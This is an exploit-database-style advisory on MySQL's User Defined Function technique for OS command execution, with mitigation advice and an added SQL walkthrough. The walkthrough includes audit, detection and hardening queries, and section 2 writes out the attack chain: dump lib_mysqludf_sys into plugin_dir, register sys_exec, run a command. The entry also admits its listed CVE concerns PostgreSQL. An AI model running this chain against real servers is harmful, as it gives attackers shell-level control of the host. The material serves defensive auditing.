vendor:
MySQL
by:
Bernardo Damele A. G.
Title: MySQL UDF for command execution
CVSS: 9 (HIGH)
CWE: 78 (OS Command Injection)
Product Name: MySQL
Affected Version From: 5.0.x
Affected Version To: 5.1.x
Patch Exists: YES
Related CVE: CVE-2009-4136 (as listed in this entry; note that CVE-2009-4136 describes a PostgreSQL session-state privilege issue, not the MySQL UDF technique documented here)
CPE: a:mysql:mysql
Metasploit:
No module is listed on this page. The following links are Rapid7 vulnerability-database entries for CVE-2009-4136 and the Red Hat, SUSE, Gentoo and CentOS advisories tracked under it, not Metasploit modules: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0429/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0427/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0428/, https://www.rapid7.com/db/vulnerabilities/postgres-cve-2009-4136/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4136/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4136/, https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2009-4136/
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Year: 2009
MySQL UDF for command execution
This entry documents a post-exploitation technique rather than a defect in the MySQL code itself. An attacker who already holds a MySQL account with the FILE privilege, can write into the directory from which the server loads UDF libraries, and has INSERT on the mysql system database (needed for CREATE FUNCTION) can place the User Defined Function (UDF) library lib_mysqludf_sys on the server and register its sys_exec function with CREATE FUNCTION ... SONAME. Calling sys_exec then runs arbitrary operating-system commands with the privileges of the mysqld process; if mysqld runs as root, so do the commands. The exploit was published in 2009 by Bernardo Damele A. G. and is listed here against MySQL 5.0.x and 5.1.x on Linux. On 5.1 and later the library must be in plugin_dir; on 5.0.x there is no plugin_dir, so the library has to land in a directory the dynamic loader searches.
Mitigation:
Upgrading MySQL alone does not remove this technique, because loading UDFs is a supported feature; the exposure is controlled through least privilege. Do not grant the FILE privilege (or INSERT on the mysql database) to application accounts; set secure_file_priv to a directory that is not plugin_dir so that SELECT ... INTO DUMPFILE cannot write a library into the plugin directory; make plugin_dir owned by root and not writable by the OS user that runs mysqld; run mysqld as an unprivileged OS user so that a loaded UDF cannot act as root; and periodically review the mysql.func table for functions nobody installed, dropping any that are not expected. Do not leave lib_mysqludf_sys or similar libraries in plugin_dir on production servers.
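The chain described above and the checks the mitigation relies on, as an added example that is not part of the original advisory or of the lib_mysqludf_sys project. It assumes a Linux MySQL 5.1 server with plugin_dir set to /usr/lib/mysql/plugin, a library already compiled for the target as lib_mysqludf_sys.so, and a placeholder application account named 'app'; the library bytes that @lib would hold are deliberately not reproduced.

```sql
-- Added example (not from the original entry). Assumptions: Linux, MySQL 5.1,
-- plugin_dir = /usr/lib/mysql/plugin, lib_mysqludf_sys.so compiled for this
-- host, and an application account 'app'@'%' used as a placeholder.

-- 1. Preconditions the technique depends on. The server is exposed when the
--    connected account holds FILE, secure_file_priv does not exclude
--    plugin_dir, and the directory is writable by the OS user running mysqld.
SELECT @@version, @@plugin_dir, @@secure_file_priv;
SELECT user, host, File_priv, Super_priv
  FROM mysql.user
 WHERE File_priv = 'Y';

-- 2. What the exploit does: write the library into plugin_dir (5.1+; on 5.0.x
--    the file must instead land in a directory the dynamic loader searches)
--    and register sys_exec from it. @lib stands for the raw bytes of
--    lib_mysqludf_sys.so, which are not reproduced here; INTO DUMPFILE writes
--    them unmodified and requires the FILE privilege.
-- SET @lib = <raw bytes of lib_mysqludf_sys.so as a hex literal>;
SELECT @lib INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
-- Runs as the mysqld OS user; sys_exec returns the command's exit status.
SELECT sys_exec('id > /tmp/mysql_udf_check');

-- 3. Detection: every registered UDF has a row in mysql.func. Any row whose
--    dl (library name) nobody installed on purpose is a finding.
SELECT name, ret, dl, type FROM mysql.func;

-- 4. Cleanup and hardening. DROP FUNCTION removes the mysql.func row; the .so
--    must also be deleted from plugin_dir by hand.
DROP FUNCTION IF EXISTS sys_exec;
REVOKE FILE ON *.* FROM 'app'@'%';
REVOKE INSERT ON mysql.* FROM 'app'@'%';
-- In my.cnf (these cannot be changed at runtime):
--   [mysqld]
--   secure_file_priv = /var/lib/mysql-files   # any directory that is NOT plugin_dir
--   plugin_dir       = /usr/lib/mysql/plugin  # root-owned, not writable by the mysql user
```

Sections 1 and 3 are safe to run as an audit on any server; section 2 registers a command-execution function and belongs in a lab only. The REVOKE statements assume 'app'@'%' had been granted those privileges; on a correctly built account they are simply absent.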